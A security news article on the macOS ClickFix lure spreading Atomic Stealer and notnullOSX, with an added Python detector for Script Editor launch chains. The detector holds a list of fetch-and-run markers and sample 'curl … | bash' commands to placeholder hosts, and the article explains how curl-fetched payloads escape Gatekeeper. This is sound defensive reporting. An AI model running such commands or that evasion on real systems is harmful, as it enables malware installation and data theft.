ZCyberNews
Malware

New Mac Malware Threats Bypass Apple Security

A new wave of malware campaigns is converging on macOS, combining social engineering with technical tricks that sidestep Apple's built-in protections. Security researchers have identified two distinct but thematically linked threats, the Atomic Stealer (AMOS) and a new Go-based infostealer dubbed notnullOSX, both delivered through a social engineering lure known as "ClickFix." These campaigns mark a shift in Mac threats: instead of relying on an obviously malicious app, they abuse trusted built-in tools and select high-value victims before the attack begins.

The ClickFix Social Engineering Ploy

At the heart of both campaigns is a social engineering tactic researchers have named "ClickFix." Potential victims are drawn in through advertisements, search engine results, or forum posts that promise a fix for a common software problem, such as an application that reports it is "Unable to open." The lure directs users to download a disk image file (.DMG).

Once the DMG is opened, the victim is presented with a fake error message claiming the application is damaged and cannot be opened. The message then instructs the user to run a provided "Fix" command in Script Editor, a legitimate Apple application, rather than in the Terminal. This is the critical psychological trick: users have been taught to be suspicious of pasting commands into the Terminal, while Script Editor looks like a harmless built-in app, so the victim's guard is lowered. No software vulnerability is exploited; the victim executes the attacker's script themselves. When run, the script silently fetches the malware payload from a remote server and installs it.

Parallel Attack Paths and Technical Evasion

While the ClickFix lure is the common thread, the two campaigns demonstrate slightly different technical execution and final payloads, highlighting the adaptability of macOS attackers.

The campaign delivering Atomic Stealer is notable for avoiding the Terminal entirely. The victim runs an AppleScript in Script Editor (the same thing osascript does from the command line), and the AppleScript in turn executes a shell command. Because no Terminal window ever appears, the chain avoids the one step most users have learned to treat as dangerous. The shell command downloads a second-stage payload, an unsigned executable that behaves as an archive utility: it decrypts and unpacks the final Atomic Stealer binary and installs it. Splitting the infection into stages, with the real payload encrypted until the last step, helps evade basic signature-based detection of the downloaded file.
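The launch chain described above and in the ClickFix section (Script Editor or osascript spawning a shell that fetches a remote script and pipes it into another shell) is something a defender can hunt for in process telemetry. The following Python is an added example, not code from the article, from Apple, or from any vendor's detection content. The ProcEvent record format, the marker list, the placeholder hostnames and the sample process tree are all constructed for this example; the one macOS-specific fact it relies on is that AppleScript's do shell script runs its command through /bin/sh.

```python
"""Flag ClickFix-style launch chains: Script Editor/osascript -> shell -> fetch-and-run.

Added example for this article; not code from the original page, from Apple,
or from any vendor's detection content. The ProcEvent format and the sample
process tree below are constructed for the example. Real telemetry (an EDR
feed, the Endpoint Security framework, `log show`) needs its own adapter that
fills in pid, ppid, process name and command line.
"""
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    name: str      # executable name as the OS reports it
    cmdline: str   # full command line, flattened to one string


# The launchers a ClickFix lure points the victim at. Script Editor executes
# the AppleScript in-process; `osascript` is its command-line counterpart.
# AppleScript's `do shell script` then spawns `/bin/sh -c "<command>"`.
SCRIPT_RUNNERS = {"Script Editor", "osascript"}
SHELLS = {"sh", "bash", "zsh"}

# Substrings typical of a fetch-and-run stage. Each one is weak on its own;
# the combination with a script-runner ancestor is what makes the signal.
DOWNLOAD_MARKERS = (
    "curl ", "wget ",                    # remote fetch
    "| sh", "| bash", "|sh", "|bash",    # pipe straight into a shell
    "base64 -", "chmod +x", "xattr -",   # decode, mark executable, strip quarantine
)


def _ancestors(ev: ProcEvent, by_pid: Dict[int, ProcEvent], depth: int = 3) -> List[ProcEvent]:
    """Walk up to `depth` parents; stops at the root or at a pid we never saw."""
    chain, cur = [], ev
    for _ in range(depth):
        cur = by_pid.get(cur.ppid)
        if cur is None:
            break
        chain.append(cur)
    return chain


def find_clickfix_chains(events: List[ProcEvent]) -> List[dict]:
    """Return one finding per shell process that (a) descends from a script
    runner within three hops and (b) carries a fetch-and-run command line."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if ev.name not in SHELLS:
            continue
        runner = next((a for a in _ancestors(ev, by_pid) if a.name in SCRIPT_RUNNERS), None)
        if runner is None:
            continue
        markers = [m for m in DOWNLOAD_MARKERS if m in ev.cmdline]
        if not markers:
            continue
        findings.append({
            "pid": ev.pid,
            "runner": runner.name,
            "runner_pid": runner.pid,
            "markers": markers,
            "cmdline": ev.cmdline,
        })
    return findings


# Constructed sample tree. The hostnames are placeholders, not real infrastructure.
SAMPLE_EVENTS = [
    ProcEvent(1, 0, "launchd", "/sbin/launchd"),
    # The ClickFix path: the victim pastes the "fix" into Script Editor.
    ProcEvent(410, 1, "Script Editor",
              "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"),
    ProcEvent(415, 410, "sh", "sh -c curl -fsSL https://fix.example.invalid/fix.sh | bash"),
    ProcEvent(416, 415, "curl", "curl -fsSL https://fix.example.invalid/fix.sh"),
    # The same command typed into Terminal: not the pattern this rule targets.
    ProcEvent(420, 1, "Terminal",
              "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"),
    ProcEvent(421, 420, "zsh", "-zsh"),
    ProcEvent(422, 421, "sh", "sh -c curl -fsSL https://tools.example.invalid/install.sh | bash"),
    # Benign AppleScript automation that shells out without fetching anything.
    ProcEvent(430, 1, "osascript", "osascript /Users/alice/Library/Scripts/backup.scpt"),
    ProcEvent(431, 430, "sh", "sh -c rsync -a /Users/alice/Documents /Volumes/Backup"),
]


if __name__ == "__main__":
    for f in find_clickfix_chains(SAMPLE_EVENTS):
        print(f"pid {f['pid']} under {f['runner']} ({f['runner_pid']}): {f['markers']}")
        print(f"  {f['cmdline']}")
```

Only the Script Editor chain is reported: the identical command under Terminal has no script-runner ancestor, and the osascript backup job shells out but fetches nothing. That is deliberate; the rule is narrow so it can page someone, and broader "curl piped to bash" hunting belongs in a separate, noisier rule.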

In parallel, the notnullOSX campaign uses the same ClickFix lure but also keeps a more traditional path: DMG files that carry the malware directly. The malware itself is written in Go, a cross-platform language increasingly popular with malware developers because it compiles easily for macOS and produces large, statically linked binaries that are tedious to analyze. Upon execution, notnullOSX performs reconnaissance, including a check of the machine's language settings so that it does not run on systems set to Russian or other Eastern European languages, a common step taken by crimeware operators to avoid drawing law enforcement attention in the regions they operate from. It then systematically hunts for and exfiltrates data from more than fifty browser profiles, cryptocurrency wallets (including Exodus, Atomic, and Binance), and keychain entries.

A Shift Towards Targeted Financial Theft

The objectives of these campaigns underscore a move towards financially motivated, targeted attacks on macOS users. Atomic Stealer is a known commodity stealer designed to harvest passwords, cookies, financial data, and files. The notnullOSX campaign takes this a step further by explicitly targeting cryptocurrency holders. Evidence suggests the operators scour public blockchain data to identify wallets holding more than $10,000 before launching a tailored attack. The malware's specific wallet targeting and its avoidance of certain regions indicate a professional, business-like approach to cybercrime aimed at maximizing return while minimizing operational risk.

These attacks also signal a direct response to Apple's ongoing platform security enhancements, such as Gatekeeper and notarization requirements. Those controls depend on the com.apple.quarantine attribute that browsers attach to downloads; a payload fetched by curl from inside a shell script never receives it, so Gatekeeper never assesses the file and an unsigned, un-notarized binary runs without any prompt. By steering the victim into a legitimate system tool like Script Editor and splitting the payload into remotely hosted, unsigned stages, attackers are finding cracks in the armor. The use of Go for notnullOSX also presents a challenge for security tools, because the language produces binaries that are harder to analyze statically.

Key Takeaways

  • Social engineering remains the primary vector. The "ClickFix" tactic is effective because it exploits a user's willingness to solve a common problem, and it hands the malicious code to a non-threatening built-in application (Script Editor) to execute.
  • Attackers are innovating to bypass macOS defenses. The shift away from Terminal-based execution and the use of remotely hosted, multi-stage payloads are direct countermeasures to Apple's security model and to years of user education about pasting commands into the Terminal.
  • macOS is increasingly in the crosshairs of financially motivated actors. The emergence of notnullOSX, with its explicit targeting of high-value crypto wallets, shows that Mac users are no longer just targets for adware but for serious, focused financial theft.
  • Vigilance with downloads is critical. Users should be extremely wary of downloading "fix" tools from unofficial sources, regardless of how legitimate an error message may appear. Always obtain software directly from official vendors or the App Store.
